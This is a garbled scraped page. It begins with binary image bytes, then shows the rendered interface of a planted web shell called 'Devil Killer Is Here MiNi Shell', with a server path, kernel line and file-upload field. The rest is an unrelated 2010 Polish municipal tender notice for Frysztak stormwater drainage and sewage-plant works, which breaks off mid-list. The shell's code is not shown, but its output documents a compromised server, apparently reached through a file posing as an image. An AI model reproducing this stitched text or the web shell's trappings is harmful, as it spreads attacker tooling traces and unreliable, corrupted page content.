JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/252901-N-2010.html

<p class="kh_header"><b>Frysztak: Wykonanie robót budowlanych dodatkowych do projektu pn :Budowa oczyszczalni ścieków w Pułankach wraz z siecią kanalizacji sanitarnej wsi Frysztak z przełączeniem istniejącego systemu odprowadzania ścieków w m. Glinik Dolny i Twierdza, Gmina Frysztak</b><br>
<b>Numer ogłoszenia: 252901 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Frysztak , ul. Księdza Wojciecha Blajera 20, 38-130 Frysztak, tel. 017 27777110 w. 302.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dodatkowych do projektu pn :Budowa oczyszczalni ścieków w Pułankach wraz z siecią kanalizacji sanitarnej wsi Frysztak z przełączeniem istniejącego systemu odprowadzania ścieków w m. Glinik Dolny i Twierdza, Gmina Frysztak.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres robót obejmuje  wykonanie
2.1.Budowa  kanalizacji deszczowej -odwodnienie utwardzonych nawierzchni na terenie budowanej oczyszczalni ścieków  w Pułankach: 
a)obsługa geodezyjna inwestycji- 1 kpl,
b) roboty w zakresie kopania rowów
-roboty ziemne -wykopy: mechaniczne na odkład - 677,9 m 3,koparkami podsiębiernymi z transportem urobku samochodami do 1 km - 241,8 m3,  ,wykopy liniowe z ręcznym wydobyciem urobku - 102,2 m3
-umocnienie ścian wykopów -  1318,2 m 2 ,
-pompowanie wody z wykopów - 102,00 m-g
-oznakowanie trasy rurociągu taśmą z tworzywa sztucznego-459,00 m
-zasypywanie wykopów -780,10 m 3
-plantowanie powierzchni skarp i dna wykopów - 688,5 m 2
c) montaż rurociągów kanalizacji deszczowej
-podłoża pod kanały i obiekty z materiałów sypkich o grubości 30 cm- 56,2 m 3
-podłoża stabilizowane cementem- 39,8 m 3 
-podłoża z materiałów sypkich o grubości 20 cm - 15,90 m3
-wzmocnienie podłoża dwoma warstwami geosiatki- 380,6 m2
-podłoża pod kanały i obiekty z materiałów sypkich 2x20 cm - 74,90 m3
-izolacja żużlem - 8,5 m3
-betonowe bloki oporowe - 0,19 m 3
-kanały z rur PVC o średnicy 150-500 mm - 378,15 mb
- rury spustowe i przykanaliki  z PVC o średnicy 120 mm- 86,10 mb
-  próba wodna szczelności kanałów- 3 próby
d)montaż studzienek
-podłoża betonowe o grubości 20 cm - 6,70 m3
-podłoża pod obiekty z podsypki piaskowo -żwirowej o grubości 30 cm - 10,00 m3
-podłoża stabilizowane cementem - 16,5 m3
-podłoża betonowe o grubości 10 cm - 3,30 m3
-podłoża pod obiekty z materiałów sypkich o grubości 20 cm - 6,50 m3
- studnie  rewizyjne i rewizyjno-ściekowe  fi 1000 mm -17  szt.
- studnie rewizyjne fi 1200 mm - 2 szt.
-przejścia przez ściany komór tulejami- 56 szt.
-pierwsza zewnętrzna warstwa izolacji- 380,90 m2
-następna warstwy izolacji zewnętrznej - 380,90 m2
-studzienki ściekowe fi 315 - 6 szt.
-podłoża pod obiekty z materiałów sypkich o gr. 25 cm - 8,70 m3
e)zabezpieczenia sieci przy skrzyżowaniu z innymi sieciami
- montaż elementów konstrukcji o rozpiętości 4,00 m, podwieszeń rurociągów i kanałów- 17 kpl.
- demontaż elementów konstrukcji o rozpiętości 4,00 m, podwieszeń rurociągów i kanałów- 17 kpl.
-układanie w wykopie rur ochronnych z PCW o śr. 110 mm - 18,0 mb
2.2. Budowa  kanalizacji deszczowej -odwodnienie skarp reaktora biologicznego i zagęszczacza osadu na terenie budowanej oczyszczalni ścieków  w Pułankach: 
a)obsługa geodezyjna inwestycji- 1 kpl,
b)roboty w zakresie kopania rowów
-roboty ziemne -wykopy: mechaniczne na odkład - 99,80m3,koparkami podsiębiernymi z transportem urobku samochodami do 1 km - 44,30 m3,  ,wykopy liniowe z ręcznym wydobyciem urobku - 16,00 m3
-umocnienie ścian wykopów -  206,80 m 2 ,
-zainstalowanie i pompowanie wody z wykopów - 1 kpl - 16 m-g
-oznakowanie trasy rurociągu taśmą z tworzywa sztucznego-98,0 m
-zasypywanie wykopów -115,80 m 3
-plantowanie powierzchni skarp i dna wykopów - 147,00 m 2
b)montaż rurociągów kanalizacji deszczowej
-podłoża pod kanały i obiekty z materiałów sypkich o grubości 30 cm- 10,50 m 3
-podłoża stabilizowane cementem- 10,50 m 3 
-kanały z rur PVC o średnicy 150-250 mm - 98,30 m
-próba wodna szczelności kanałów- 1 próba
-podłoża pod kanały i obiekty z materiałów sypkich 2x20 cm - 14,0 m3
c)montaż studzienek
-podłoża betonowe o grubości 10 cm - 1,45 m3
-podłoża z materiałów sypkich o grubości 20 cm - 2,80 m3
-podłoża stabilizowane cementem - 2,80 m3
-podłoża betonowe o grubości 10 cm - 3,30 m3
- studnie  rewizyjne  fi 1000 mm -4 szt.
-przejścia przez ściany komór tulejami- 12 szt.
-pierwsza zewnętrzna warstwa izolacji- 56,50 m2
-następna warstwy izolacji zewnętrznej - 56,50 m2
-studzienki ściekowe fi 315 - 4 szt.
-podłoża pod obiekty z materiałów sypkich o gr. 25 cm - 6,30 m3
d)odwodnienie powierzchniowe
-wykopy z załadunkiem ręcznym i transportem samochodami na odległość do 1 km- 34,50 m3
-ułożenie ścieków prefabrykowanych z płyt korytkowych grubości 15 cm na podbudowie-191,50 m
e)zabezpieczenia sieci przy skrzyżowaniu z innymi sieciami
- montaż elementów konstrukcji o rozpiętości 4,00 m, podwieszeń rurociągów i kanałów- 1 kpl.
- demontaż elementów konstrukcji o rozpiętości 4,00 m, podwieszeń rurociągów i kanałów- 1 kpl.
2.3.Kanalizacja ogólnospławna -włączenie projektowanej kanalizacji deszczowej do końcowego odcinka kanalizacji sanitarnej odprowadzającej ścieki oczyszczone na oczyszczalni do rzeki Wisłok
a)obsługa geodezyjna inwestycji- 1 kpl,
b) roboty w zakresie kopania rowów
-roboty ziemne -wykopy: mechaniczne na odkład - 239,90m3 ,koparkami podsiębiernymi z transportem urobku samochodami do 1 km - 156,50 m3,  ,wykopy liniowe z ręcznym wydobyciem urobku - 44,0 m3
-umocnienie ścian wykopów -  352,30 m 2 ,
-pompowanie wody z wykopów - 44,00 m-g
-oznakowanie trasy rurociągu taśmą z tworzywa sztucznego-105,00 m
-zasypywanie wykopów -283,90 m 3
-plantowanie powierzchni skarp i dna wykopów - 157,5 m 2
c) montaż rurociągów kanalizacji deszczowej
-podłoża pod kanały i obiekty z materiałów sypkich o grubości 30 cm- 31,6 m 3
-podłoża stabilizowane cementem- 31,60 m 3 
-kanały z rur PVC średnicy 500 mm -105,40 m
-próba wodna szczelności kanałów- 1 próba
-podłoża pod kanały i obiekty z materiałów sypkich 2x20 cm - 42,20 m3
d)montaż studzienek
-podłoża betonowe o grubości 10 cm - 1,40 m3
-podłoża pod obiekty z materiałów sypkich o grubości 20 cm - 2,70 m3
-podłoża stabilizowane cementem - 2,70 m3
- studnie rewizyjne fi 1200 mm - 3 szt.
-przejścia przez ściany komór tulejami- 6 szt.
-pierwsza zewnętrzna warstwa izolacji- 73,85 m2
-następna warstwy izolacji zewnętrznej - 73,85 m2
2.4.Wykonanie instalacji uziemiającej i piorunochronnej obiektów kubaturowych:
a) budynek technologiczny
-roboty ziemne - 1 kpl
-roboty montażowe -1 kpl
-rusztowania-1 kpl
-pomiary - 1 kpl
b) budynek administracyjno-socjalny
-roboty ziemne - 1 kpl
-roboty montażowe -1 kpl
-rusztowania-1 kpl
-pomiary - 1 kpl
c) budynek wielofunkcyjny
-roboty ziemne - 1 kpl
-roboty montażowe -1 kpl
-rusztowania-1 kpl
-pomiary - 1 kpl
2.5. Wykonanie przebudowy lub uzupełnień sieci kanalizacji sanitarnej wsi Frysztak wraz z przyłączami do budynków oraz demontażem 1 sztuki pompowni sieciowej
- wykonanie budowy lub przebudowy odcinków sieciowych i przykanalików z PE lub PVC  fi 160 o długości  350,49 mb
- wykonanie demontażu  istniejącej pompowni sieciowej - 1 kpl
- transport , montaż oraz uruchomienie 1 pompowni sieciowej z zasilaniem energetycznym - 1 kpl.
zgodnie z przedmiarem robót.
2.6.Wykonanie bramy wjazdowej w ogrodzeniu o wymiarach 6,00x1,50 m - brama dwuskrzydłowa -  9,00 m2
2.7.Zamontowanie w poziomie stropu poddasza w budynkach BAS,BW i BT schodków wejściowych wraz z klapa o wysokości do 3 m - 3 sztuki.
2.8.Wykonanie 7 sztuk kominków wentylacyjnych fi 160 w przekryciu reaktora biologicznego oraz zagęszczacza osadu
2.9.Wykonanie 14 szt. włazów inspekcyjnych ze stali kwasoodpornej o wymiarach 30x30 cm, na przekryciach reaktora biologicznego
2.10.Wykonanie czerpni i wyrzutni powietrza w pomieszczeniu agregatorni
2.11. Wykonanie dodatkowej pokrywy stalowej ze stali nierdzewnej o wym.0,70 x 1,10 m w budynku technologicznym.
3. Szczegóły odzwierciedla projekt wykonawczy budowy kanalizacji deszczowej , przedmiary robót oraz  specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.40-8, 45.34.20.00-6, 45.31.23.11-0, 45.31.23.10-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości 9 000,00zł (słownie: dziewięć   tysięcy złotych) do dnia 30.09.2010 r. do godz. 10:30 w wybranej przez siebie formie dopuszczonej ustawą Prawo zamówień publicznych . Wadium musi być wniesione przed upływem terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy  Prawo zamówień publicznych ,składa następujące dokumenty:
1) Aktualny odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt.2 ustawy , wystawione nie wcześniej niż 6  miesięcy  przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art.24.ust.1 pkt.2 ustawy.  
2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że    
    Wykonawca nie zalega z opłacaniem  podatków lub zaświadczenie, że uzyskał   
    przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
    płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
    nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
3)Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy   
    Rolniczego Ubezpieczenia  Społecznego potwierdzające  że Wykonawca nie zalega z 
    opłacaniem  składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, 
    że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
    płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione 
    nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
4)Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie 
   właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie 
   określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed 
   upływem terminu składania ofert.  
5) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 
     pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
6) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 ust.1 Prawa zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku posiadania przez Wykonawcę niezbędnej  
  wiedzy i doświadczenia do wykonania zamówienia należy złożyć następujące dokumenty: 
	1)Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju  i wartości , daty i miejsca wykonania wraz z załączeniem dokumentu potwierdzającego , że roboty  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Za minimum Zamawiający uznaje wykonanie 2 zadań polegających na budowie  lub modernizacji sieci kanalizacji deszczowej o wartości robót nie mniejszej niż 280 000,00 zł. netto każda , zawierających w swym zakresie co najmniej wykonanie rurociągów o średnicy minimum fi 500 mm i łącznej długości  minimum 100 mb , oraz o średnicy minimum 250 mm i  łącznej długości 200 mb .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku przez Wykonawcę dysponowania potencjałem technicznym należy złożyć następujące dokumenty: 
1.Wykaz  narzędzi , wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami. 
W celu  zapewnienia  wykonania  terminowości robót , za minimum Zamawiający uznaje wskazanie  podstawy do dysponowania 5 sztukami koparek w tym: 2 szt. o pojemności łyżki min.1,2 m3, 2 szt. o pojemności łyżki od 0,25-0,6 m3,  jednej sztuki o pojemności łyżki 0,8 m3 , oraz 1 kompletnego zestawu igłofiltrów ,co podyktowane jest występowaniem gruntów o wysokiej nasiąkliwości oraz sąsiedztwa rzeki Wisłok , a także 1 płytą dynamiczną do kontroli zagęszczenia gruntu ze względu na przebieg kanalizacji deszczowej w terenach drogowych 
2. W przypadku gdy w wykazie opisanym w pkt 1 Wykonawca wskazał sprzęt którymi będzie dysponował - obowiązany jest do wykazu dołączyć pisemne zobowiązanie  innych podmiotów do udostępnienia sprzętu na czas wykonywania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku dysponowania przez Wykonawcę  osobami zdolnymi do wykonania zamówienia należy złożyć następujące dokumenty: 
1.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności , oraz informacją o podstawie do dysponowania tymi osobami , wraz z podaniem numeru uprawnień.Za minimum Zamawiający uznaje wskazanie osób które  zapewnią wykonanie i kierowanie robotami specjalistycznymi objętymi umową przez osoby posiadające stosowne kwalifikacje zawodowe i  uprawnienia budowlane, tj.:
osoby kierujące poszczególnymi robotami budowlanymi muszą posiadać uprawnienia budowlane w specjalności:
-konstrukcyjno - budowlanej 
-instalacyjnej w zakresie sieci, instalacji i urządzeń  sanitarnych 
-instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
Ponadto każda z tych osób musi przynależeć do Okręgowej Izby Inżynierów Budownictwa.
Wykonawca zobowiązany jest wskazać w ofercie, która z ww. osób będzie nadzorować proces budowlany w świetle ustawy Prawo budowlane (kierownik budowy) .
2.W przypadku gdy w wykazie opisanym w pkt .1  Wykonawca wskazał osoby  którymi będzie dysponował - obowiązany jest do wykazu dołączyć pisemne zobowiązanie  innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia należy złożyć następujące dokumenty: 
1.Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym           Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków    finansowych lub zdolność kredytową Wykonawcy w wysokości nie mniejszej niż  350 000,00  zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
2.Opłaconej polisy , a w przypadku jej braku innego dokumentu potwierdzając ego , że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia , na kwotę nie mniejsza niż 350 000,00 zł.
3. Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
